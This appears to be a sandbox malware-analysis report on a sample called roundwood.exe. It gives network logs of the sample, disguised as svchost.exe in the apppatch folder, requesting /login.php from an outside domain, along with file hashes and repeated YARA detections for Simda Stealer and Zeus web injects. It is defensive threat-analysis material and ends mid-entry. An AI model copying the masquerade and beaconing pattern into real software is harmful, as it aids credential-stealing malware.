2024-08-23 16:43:49 UTC	1369	IN	Data Raw: 2d 6c 6f 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 3a 6e 6f 74 28 5b 64 69 73 74 61 6e 63 65 5d 29 3a 6e 6f 74 28 5b 61 63 74 69 76 65 5d 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 30 76 68 29 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3e 69 6e 70 75 74 2c 61 6d 70 2d 61 75 74 6f 63 6f Data Ascii: -loader-background{display:none!important}amp-story-page:not(:first-of-type):not([distance]):not([active]){transform:translateY(1000vh)!important}amp-autocomplete{position:relative!important;display:inline-block!important}amp-autocomplete>input,amp-autoco
2024-08-23 16:43:49 UTC	1369	IN	Data Raw: 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 69 6e 74 72 69 6e 73 69 63 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 Data Ascii: width][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;position:relative;max-width:100%}.i-amphtml-layout-intrinsic .i-amphtml-sizer{max-width:100%}.i-amphtml-intrinsic-sizer{max-width:100%;display:block!important}.i-amphtml-layout-container
2024-08-23 16:43:49 UTC	1369	IN	Data Raw: 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 72 69 67 68 74 3a 30 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 72 65 70 6c 61 63 65 64 2d 63 6f 6e 74 65 6e 74 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 65 65 6e 2d 72 65 61 64 65 72 7b 70 61 64 64 69 6e 67 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 65 65 6e 2d 72 65 61 64 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 74 6f 70 3a 30 70 78 21 69 6d 70 6f Data Ascii: phtml-layout-size-defined .i-amphtml-fill-content{position:absolute;top:0;left:0;bottom:0;right:0}.i-amphtml-replaced-content,.i-amphtml-screen-reader{padding:0!important;border:none!important}.i-amphtml-screen-reader{position:fixed!important;top:0px!impo
2024-08-23 16:43:49 UTC	1369	IN	Data Raw: 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3e 69 6d 67 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 2c 5b 77 69 64 Data Ascii: not([layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtml-element)[i-amphtml-ssr]>img.i-amphtml-fill-content{display:block}.i-amphtml-notbuilt:not(.i-amphtml-layout-container),[layout]:not([layout=container]):not(.i-amphtml-element),[wid
2024-08-23 16:43:49 UTC	1369	IN	Data Raw: 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 61 74 74 72 28 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 29 7d 69 2d 61 6d 70 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 2c 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 Data Ascii: -query{display:none!important}.i-amphtml-element-error{background:red!important;color:#fff!important;position:relative!important}.i-amphtml-element-error:before{content:attr(error-message)}i-amp-scroll-container,i-amphtml-scroll-container{position:absolut
2024-08-23 16:43:49 UTC	1369	IN	Data Raw: 65 72 72 6f 72 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 70 78 29 7b 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 3e 73 65 63 74 69 6f 6e 29 3e 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 66 65 66 65 66 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 66 64 66 64 66 7d 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 Data Ascii: error],form [submit-success],form [submitting]{display:none}amp-accordion{display:block!important}@media (min-width:1px){:where(amp-accordion>section)>:first-child{margin:0;background-color:#efefef;padding-right:20px;border:1px solid #dfdfdf}:where(amp-ac

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	50848	188.114.96.3	443	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-23 16:43:51 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Connection: Keep-Alive
2024-08-23 16:43:51 UTC	6	OUT	Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
2024-08-23 16:43:53 UTC	905	IN	HTTP/1.1 404 Not Found Date: Fri, 23 Aug 2024 16:43:53 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/" server-timing: amp_sanitizer;dur="60.4",amp_style_sanitizer;dur="25.0",amp_tag_and_attribute_sanitizer;dur="28.8",amp_optimizer;dur="27.3" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2tece5BWV8IkYRy59M7RuAxejrceWuYYZ1Hi%2BTV2i4%2FVCwx3UmpAbW4PHfjr8zX4%2B5RHUEWCJlKQ1jqj3NjOtljicf3Hk2jviyb2WxLlxajy0t%2BE6iewf%2Bhzu%2BZExA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c905ed8f67ce2-EWR alt-svc: h3=":443"; ma=86400
2024-08-23 16:43:53 UTC	464	IN	Data Raw: 37 63 32 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62 Data Ascii: 7c28<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
2024-08-23 16:43:53 UTC	1369	IN	Data Raw: 33 31 34 31 35 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 2c 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 68 65 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 6f 7a Data Ascii: 31415000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz
2024-08-23 16:43:53 UTC	1369	IN	Data Raw: 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 7b 6f 76 65 72 Data Ascii: -amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{visibility:hidden}#i-amphtml-wrapper+body[i-amphtml-lightbox] .i-amphtml-lightbox-element{visibility:visible}#i-amphtml-wrapper.i-amphtml-scroll-disabled,.i-amphtml-scroll-disabled{over
2024-08-23 16:43:53 UTC	1369	IN	Data Raw: 6f 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 3a 6e 6f 74 28 5b 64 69 73 74 61 6e 63 65 5d 29 3a 6e 6f 74 28 5b 61 63 74 69 76 65 5d 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 30 76 68 29 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3e 69 6e 70 75 74 2c 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 Data Ascii: oader-background{display:none!important}amp-story-page:not(:first-of-type):not([distance]):not([active]){transform:translateY(1000vh)!important}amp-autocomplete{position:relative!important;display:inline-block!important}amp-autocomplete>input,amp-autocomp
2024-08-23 16:43:53 UTC	1369	IN	Data Raw: 64 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 69 6e 74 72 69 6e 73 69 63 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e Data Ascii: dth][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;position:relative;max-width:100%}.i-amphtml-layout-intrinsic .i-amphtml-sizer{max-width:100%}.i-amphtml-intrinsic-sizer{max-width:100%;display:block!important}.i-amphtml-layout-container,.

Target ID:	0
Start time:	12:42:08
Start date:	23/08/2024
Path:	C:\Users\user\Desktop\roundwood.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\roundwood.exe"
Imagebase:	0x400000
File size:	223'888 bytes
MD5 hash:	CE11C26163587185B09CB6720E4F0D76
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000003.2027860859.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000003.2027860859.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:42:09
Start date:	23/08/2024
Path:	C:\Windows\apppatch\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\apppatch\svchost.exe"
Imagebase:	0x400000
File size:	223'888 bytes
MD5 hash:	B3CAC91D21D93F1989191CE7572B7F7E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2418070085.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2471833561.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2500002475.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2499726055.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2048298647.0000000002970000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2508798151.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2482262641.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2499866560.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2487147831.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2392591021.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2458081836.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2422680364.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2500272198.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2508679184.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2510071854.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2395495961.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2500141724.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2510491693.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2448622131.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2508393493.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2501374465.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2497016320.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2501604041.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2455382191.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2469676261.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.3272240736.0000000002915000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2510323696.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2508541619.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.3060629328.0000000002DC0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2501156976.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000003.2039128635.000000000088E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2039128635.000000000088E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2478689860.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2450971544.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2510195177.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.3273788686.0000000002D63000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2508233599.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2498994285.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.3060188818.0000000002DC0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in 